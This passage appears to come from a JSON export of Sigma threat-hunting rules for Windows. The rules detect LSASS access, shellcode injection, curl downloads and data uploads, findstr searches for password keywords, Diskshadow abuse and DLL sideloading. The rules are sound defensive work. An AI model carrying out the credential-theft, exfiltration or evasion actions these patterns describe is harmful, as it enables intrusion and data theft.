filter2:\n        SourceImage|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    # Microsoft Gaming Services\n    filter3:\n        SourceImage|startswith: 'C:\\Program Files\\WindowsApps\\'\n        SourceImage|endswith: '\\GamingServices.exe'\n    # Process Explorer\n    filter4:\n        SourceImage|endswith:\n            - '\\PROCEXP64.EXE'\n            - '\\PROCEXP.EXE'\n    # VMware Tools\n    filter5:\n        SourceImage|startswith: 'C:\\ProgramData\\VMware\\VMware Tools\\'\n        SourceImage|endswith: '\\vmtoolsd.exe'\n    # Antivirus and EDR agents\n    filter6:\n        SourceImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        SourceImage|contains: 'Antivirus'\n    filter_nextron:\n        # SourceImage|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'  # Can be a manual THOR installation\n        SourceImage|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n    filter_ms_products:\n        SourceImage|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\vs_bootstrapper_'\n        GrantedAccess: '0x1410'\n    # Generic Filter for 0x1410 filter (caused by so many programs like DropBox updates etc.)\n    filter_generic:\n        SourceImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\WINDOWS\\system32\\'\n    filter_wer:\n        SourceCommandLine: 'C:\\WINDOWS\\system32\\wermgr.exe -upload'\n    filter_localappdata:\n        SourceImage|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\'\n        SourceImage|endswith:\n            - '\\Microsoft VS Code\\Code.exe'\n            - '\\software_reporter_tool.exe'\n            - '\\DropboxUpdate.exe'\n            - '\\MBAMInstallerService.exe'\n            - '\\WebEx\\WebexHost.exe'\n            - '\\Programs\\Microsoft VS Code\\Code.exe'\n            - '\\JetBrains\\Toolbox\\bin\\jetbrains-toolbox.exe'\n    filter_xampp:\n        SourceImage|endswith: '\\xampp-control.exe'\n        GrantedAccess: '0x410'\n    filter_games:\n        SourceImage|contains: '\\SteamLibrary\\steamapps\\'\n        GrantedAccess:\n            - '0x410'\n            - '0x10'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Legitimate software accessing LSASS process for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_susp_potential_shellcode_injection.yml",
    "content": "title: Potential Shellcode Injection\nid: 250ae82f-736e-4844-a68b-0b5e8cc887da\nstatus: test\ndescription: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.\nreferences:\n    - https://github.com/EmpireProject/PSInject\nauthor: Bhabesh Raj\ndate: 2022-03-11\nmodified: 2024-07-02\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.threat-hunting\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        GrantedAccess:\n            - '0x147a'\n            - '0x1f3fff'\n        CallTrace|contains: 'UNKNOWN'\n    filter_main_wmiprvse:\n        SourceImage: 'C:\\Windows\\System32\\Wbem\\Wmiprvse.exe'\n        TargetImage: 'C:\\Windows\\system32\\lsass.exe'\n    filter_optional_dell_folders:\n        # If dell software is installed we get matches like these\n        # Example 1:\n        #   SourceImage: C:\\Program Files\\Dell\\SupportAssistAgent\\bin\\SupportAssistAgent.exe\n        #   TargetImage: C:\\Program Files\\Dell\\TechHub\\Dell.TechHub.exe\n        #   GrantedAccess: 0x1F3FFF\n        # Example 2:\n        #   SourceImage: C:\\Program Files (x86)\\Dell\\UpdateService\\DCF\\Dell.DCF.UA.Bradbury.API.SubAgent.exe\n        #   TargetImage: C:\\Program Files\\Dell\\TechHub\\Dell.TechHub.exe\n        #   GrantedAccess: 0x1F3FFF\n        # Example 3:\n        #   SourceImage: C:\\Program Files\\Dell\\TechHub\\Dell.TechHub.exe\n        #   TargetImage: C:\\Program Files (x86)\\Dell\\UpdateService\\DCF\\Dell.DCF.UA.Bradbury.API.SubAgent.exe\n        #   GrantedAccess: 0x1F3FFF\n        SourceImage|startswith:\n            - 'C:\\Program Files\\Dell\\'\n            - 'C:\\Program Files (x86)\\Dell\\'\n        TargetImage|startswith:\n            - 'C:\\Program Files\\Dell\\'\n            - 'C:\\Program Files (x86)\\Dell\\'\n    filter_optional_dell_specifc:\n        SourceImage: 'C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe'\n        TargetImage: 'C:\\Windows\\Explorer.EXE'\n    filter_optional_visual_studio:\n        SourceImage|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n        TargetImage|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_7zip_password_extraction.yml",
    "content": "title: Password Protected Compressed File Extraction Via 7Zip\nid: b717b8fd-6467-4d7d-b3d3-27f9a463af77\nstatus: test\ndescription: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.\nreferences:\n    - https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-10\nmodified: 2024-07-16\ntags:\n    - attack.collection\n    - attack.t1560.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Description|contains: '7-Zip'\n        - Image|endswith:\n              - '\\7z.exe'\n              - '\\7zr.exe'\n              - '\\7za.exe'\n        - OriginalFileName:\n              - '7z.exe'\n              - '7za.exe'\n    selection_password:\n        CommandLine|contains|all:\n            - ' -p'\n            - ' x '\n            - ' -o'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activity is expected since extracting files with a password can be common in some environment.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_attrib_system.yml",
    "content": "title: Set Files as System Files Using Attrib.EXE\nid: bb19e94c-59ae-4c15-8c12-c563d23fe52b\nrelated:\n    - id: efec536f-72e8-4656-8960-5e85d091345b\n      type: similar\nstatus: test\ndescription: Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib\n    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib\n    - https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\nauthor: frack113\ndate: 2022-02-04\nmodified: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\attrib.exe'\n        - OriginalFileName: 'ATTRIB.EXE'\n    selection_cli:\n        CommandLine|contains: ' +s '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_boinc_execution.yml",
    "content": "title: Potential BOINC Software Execution (UC-Berkeley Signature)\nid: 0090b851-3543-42db-828c-02fee986ff0b\nstatus: test\ndescription: |\n    Detects the use of software that is related to the University of California, Berkeley via metadata information.\n    This indicates it may be related to BOINC software and can be used maliciously if unauthorized.\nreferences:\n    - https://boinc.berkeley.edu/\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1553\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description: 'University of California, Berkeley'\n    condition: selection\nfalsepositives:\n    - This software can be used for legitimate purposes when installed intentionally.\nlevel: informational\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_cmd_redirect.yml",
    "content": "title: CMD Shell Output Redirect\nid: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a\nrelated:\n    - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of the redirection character \">\" to redirect information on the command line.\n    This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.\nreferences:\n    - https://ss64.com/nt/syntax-redirection.html\nauthor: frack113\ndate: 2022-01-22\nmodified: 2024-03-19\ntags:\n    - attack.discovery\n    - attack.t1082\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|contains: '>'\n    filter_optional_idm_extension:\n        CommandLine|contains:\n            - 'C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe'\n            - 'chrome-extension://'\n            - '\\\\.\\pipe\\chrome.nativeMessaging'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_cmd_set_prompt_abuse.yml",
    "content": "title: Potential File Override/Append Via SET Command\nid: 65e4c134-ee52-4099-9e35-5e17a4b45c62\nstatus: test\ndescription: |\n    Detects the use of the \"SET\" internal command of Cmd.EXE with the /p flag followed directly by an \"=\" sign.\n    Attackers used this technique along with an append redirection operator \">>\" in order to update the content of a file indirectly.\n    Ex: cmd /c >> example.txt set /p=\"test data\". This will append \"test data\" to contents of \"example.txt\".\n    The typical use case of the \"set /p=\" command is to prompt the user for input.\nreferences:\n    - https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1\n    - https://ss64.com/nt/set.html\nauthor: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan)\ndate: 2024-08-22\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains:\n            - '/c set /p='\n            - '\"set /p='\n            - '>>*set /p=' # To catch edge cases where the attacker passes it via a \"cmd /c\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the SET with the \"/p\" flag for user prompting. command in administrative scripts or user-generated scripts.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_conhost_headless_execution.yml",
    "content": "title: Headless Process Launched Via Conhost.EXE\nid: 00ca75ab-d5ce-43be-b86c-55ff39c6abfc\nrelated:\n    - id: 056c7317-9a09-4bd4-9067-d051312752ea\n      type: derived\nstatus: test\ndescription: |\n    Detects the launch of a child process via \"conhost.exe\" with the \"--headless\" flag.\n    The \"--headless\" flag hides the windows from the user upon execution.\nreferences:\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\conhost.exe'\n        ParentCommandLine|contains: '--headless'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_csc_compilation.yml",
    "content": "title: Dynamic .NET Compilation Via Csc.EXE - Hunting\nid: acf2807c-805b-4042-aab9-f86b6ba9cb2b\nrelated:\n    - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4\n      type: derived\nstatus: test\ndescription: Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.\nreferences:\n    - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/\n    - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf\n    - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/\n    - https://twitter.com/gN3mes1s/status/1206874118282448897\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-02\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\csc.exe'\n        CommandLine|contains: '/noconfig /fullpaths @'\n    condition: selection\nfalsepositives:\n    - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_download.yml",
    "content": "title: File Download Via Curl.EXE\nid: 9a517fca-4ba3-4629-9278-a68694697b81\nrelated:\n    - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution\n      type: derived\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution\n      type: derived\nstatus: test\ndescription: Detects file download using curl.exe\nreferences:\n    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-05\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_remote:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    condition: all of selection_*\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\n    - The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_execution.yml",
    "content": "title: Curl.EXE Execution\nid: bbeaed61-1990-4773-bf57-b81dbad7db2d\nrelated:\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution\n      type: derived\nstatus: test\ndescription: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server\nreferences:\n    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-05\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_fileupload.yml",
    "content": "title: Potential Data Exfiltration Via Curl.EXE\nid: 00bca14a-df4e-4649-9054-3f2aa676bc04\nstatus: test\ndescription: Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration\nreferences:\n    - https://twitter.com/d1r4c/status/1279042657508081664\n    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file\n    - https://curl.se/docs/manpage.html\nauthor: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)\ndate: 2020-07-03\nmodified: 2023-05-02\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_cli:\n        - CommandLine|contains:\n              - ' --form' # Also covers the \"--form-string\"\n              - ' --upload-file '\n              - ' --data '\n              - ' --data-' # For flags like: \"--data-ascii\", \"--data-binary\", \"--data-raw\", \"--data-urlencode\"\n        - CommandLine|re: '\\s-[FTd]\\s' # We use regex to ensure a case sensitive argument detection\n    filter_optional_localhost:\n        CommandLine|contains:\n            - '://localhost'\n            - '://127.0.0.1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Scripts created by developers and admins\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_useragent.yml",
    "content": "title: Curl.EXE Execution With Custom UserAgent\nid: 3286d37a-00fd-41c2-a624-a672dcd34e60\nstatus: test\ndescription: Detects execution of curl.exe with custom useragent options\nreferences:\n    - https://curl.se/docs/manpage.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd\nauthor: frack113\ndate: 2022-01-23\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_curl:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_opt:\n        CommandLine|contains:\n            - ' -A '\n            - ' --user-agent '\n    condition: all of selection_*\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_dfsvc_child_processes.yml",
    "content": "title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process\nid: 241d52b5-eee0-49d0-ac8a-8b9c15c7221c\nstatus: test\ndescription: Detects child processes of \"dfsvc\" which indicates a ClickOnce deployment execution.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\dfsvc.exe'\n        Image|endswith: '\\AppData\\Local\\Apps\\2.0\\'\n    condition: selection\nfalsepositives:\n    - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_child_process.yml",
    "content": "title: Diskshadow Child Process Spawned\nid: 56b1dde8-b274-435f-a73a-fb75eb81262a\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: Detects any child process spawning from \"Diskshadow.exe\". This could be due to executing Diskshadow in interpreter mode or script mode and using the \"exec\" flag to launch other applications.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\nauthor: Harjot Singh @cyb3rjy0t\ndate: 2023-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\diskshadow.exe'\n    filter_main_werfault:\n        Image|endswith: ':\\Windows\\System32\\WerFault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Likely from legitimate usage of Diskshadow in Interpreter mode.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_script_mode.yml",
    "content": "title: Diskshadow Script Mode Execution\nid: 0c2f8629-7129-4a8a-9897-7e0768f13ff2\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag. Attackers often abuse \"diskshadow\" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\nauthor: Ivan Dyachkov, oscd.community\ndate: 2020-10-07\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'diskshadow.exe'\n        - Image|endswith: '\\diskshadow.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-s '\n    condition: all of selection_*\nfalsepositives:\n    - Likely from legitimate backup scripts\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_explorer_child_of_shell_process.yml",
    "content": "title: Potential Proxy Execution Via Explorer.EXE From Shell Process\nid: 9eb271b9-24ae-4cd4-9465-19cfc1047f3e\nstatus: test\ndescription: |\n    Detects the creation of a child \"explorer.exe\" process from a shell like process such as \"cmd.exe\" or \"powershell.exe\".\n    Attackers can use \"explorer.exe\" for evading defense mechanisms by proxying the execution through the latter.\n    While this is often a legitimate action, this rule can be use to hunt for anomalies.\n    Muddy Waters threat actor was seeing using this technique.\nreferences:\n    - https://twitter.com/CyberRaiju/status/1273597319322058752\n    - https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/\nauthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative\ndate: 2020-10-05\nmodified: 2024-06-21\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: 'explorer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate explorer.exe run from a shell host like \"cmd.exe\" or \"powershell.exe\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_extexport_execution.yml",
    "content": "title: Potential DLL Sideloading Activity Via ExtExport.EXE\nid: fb0b815b-f5f6-4f50-970f-ffe21f253f7a\nstatus: test\ndescription: |\n    Detects the execution of \"Extexport.exe\".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.\n    It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names \"mozcrt19.dll\", \"mozsqlite3.dll\", or \"sqlite.dll\".\n    Arbitrary DLLs can also be loaded if a specific number of flags was provided.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Extexport/\n    - https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/\n    - https://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/\n    - https://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/\n    - https://securelist.com/the-tetrade-brazilian-banking-malware/97779/\n    - https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-26\nmodified: 2024-08-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Extexport.exe'\n        - OriginalFileName: 'extexport.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_findstr_password_recon.yml",
    "content": "title: Potential Password Reconnaissance Via Findstr.EXE\nid: 1a0f6f16-2099-4753-9a02-43b6ac7a1fa5\nstatus: test\ndescription: Detects command line usage of \"findstr\" to search for the \"passwords\" keyword in a variety of different languages\nreferences:\n    - https://steflan-security.com/windows-privilege-escalation-credential-harvesting/\n    - https://adsecurity.org/?p=2288\nauthor: Josh Nickels\ndate: 2023-05-18\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'contraseña' # Spanish\n            - 'hasło' # Polish\n            - 'heslo' # Czech\n            - 'parola' # Italian\n            - 'passe' # French\n            - 'passw' # German, English\n            - 'senha' # Portuguese\n            - 'senord' # Swedish\n            - '密碼' # Cantonese\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_iexpress_execution.yml",
    "content": "title: New Self Extracting Package Created Via IExpress.EXE\nid: c2b478fc-09bf-40b2-8768-ab3ec8d61c9a\nstatus: test\ndescription: |\n    Detects the \"iexpress.exe\" utility creating self-extracting packages.\n    Attackers where seen leveraging \"iexpress\" to compile packages on the fly via \".sed\" files.\n    Investigate the command line options provided to \"iexpress\" and in case of a \".sed\" file, check the contents and legitimacy of it.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1_parent:\n        ParentImage|endswith: '\\iexpress.exe'\n    selection_1_img:\n        - Image|endswith: '\\makecab.exe'\n        - OriginalFileName: 'makecab.exe'\n    selection_2_img:\n        - Image|endswith: '\\iexpress.exe'\n        - OriginalFileName: 'IEXPRESS.exe'\n    selection_2_cli:\n        CommandLine|contains: ' /n '\n    condition: all of selection_1_* or all of selection_2_*\nfalsepositives:\n    - Administrators building packages using iexpress.exe\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_microsoft_workflow_compiler_execution.yml",
    "content": "title: Microsoft Workflow Compiler Execution\nid: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d\nstatus: test\ndescription: |\n    Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.\nreferences:\n    - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/\nauthor: Nik Seetharaman, frack113\ndate: 2019-01-16\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1127\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Microsoft.Workflow.Compiler.exe'\n        - OriginalFileName: 'Microsoft.Workflow.Compiler.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate MWC use (unlikely in modern enterprise environments)\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_mode_codepage_change.yml",
